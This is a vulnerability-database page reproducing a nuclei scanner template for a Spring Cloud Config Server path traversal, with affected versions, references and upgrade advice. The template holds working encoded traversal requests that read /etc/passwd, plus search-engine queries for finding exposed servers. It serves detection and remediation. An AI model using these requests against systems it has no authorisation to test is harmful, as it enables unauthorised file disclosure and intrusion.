Lucene search
K

Spring Cloud Config Server - Path Traversal

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 14 Views

Spring Cloud Config Server path traversal via profile substitution may access files outside configured directories; upgrade.

Related
Refs
Code
id: CVE-2026-22739

info:
  name: Spring Cloud Config Server - Path Traversal
  author: 0x_Akoko,vulnh0lic
  severity: high
  description: |
    Spring Cloud 3.1.x < 3.1.13, 4.1.x < 4.1.9, 4.2.x < 4.2.3, 4.3.x < 4.3.2, and 5.0.x < 5.0.2 contain a path traversal caused by profile parameter substitution in Config Server using native file system backend, letting attackers access files outside configured directories, exploit requires crafted request.
  impact: |
    Attackers can access arbitrary files outside intended directories, potentially exposing sensitive information
  remediation: |
    "Upgrade to versions 3.1.13, 4.1.9, 4.2.3, 4.3.2, or 5.0.2 or later.
  reference:
    - https://spring.io/security/cve-2026-22739
    - https://spring.io/blog/2026/03/23/spring-cloud-config-5-0-2-4-3-2-4-2-6-4-1-9-3-1-13-released
    - https://nvd.nist.gov/vuln/detail/CVE-2026-22739
    - https://www.herodevs.com/vulnerability-directory/cve-2026-22739
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
    cvss-score: 8.6
    cve-id: CVE-2026-22739
    epss-score: 0.0122
    epss-percentile: 0.6503
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 5
    vendor: vmware
    product: spring_cloud_config
    shodan-query: http.html:"propertySources"
    fofa-query: body="propertySources" && body="profiles" && body="label"
  tags: cve,cve2026,spring,spring-cloud,config-server,lfi,traversal

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/application/default"

    matchers:
      - type: word
        part: body
        words:
          - "propertySources"
          - '"profiles"'
          - '"label"'
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/application/..%2F..%2F..%2F..%2F..%2Fetc"
      - "{{BaseURL}}/application/..%2F..%2F..%2F..%2F..%2Fetc/main"
      - "{{BaseURL}}/application/..%252F..%252F..%252F..%252F..%252Fetc"
      - "{{BaseURL}}/application/default%2C..%2F..%2F..%2F..%2F..%2Fetc"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "\"root\":\"x:0:0:"
          - "root:.*:0:0"
        condition: or

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 490a004630440220506741ad820ea450cddf3037b763fcd88091d6187ba7eae47172e08f8c55bbf802207aa5d939480f6b0e9c1308fe4077a5cf8f2ac487311adaa87c92d42293101791:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Mar 2026 23:31Current
7.2High risk
Vulners AI Score7.2
CVSS 3.18.6
EPSS0.0122
SSVC
14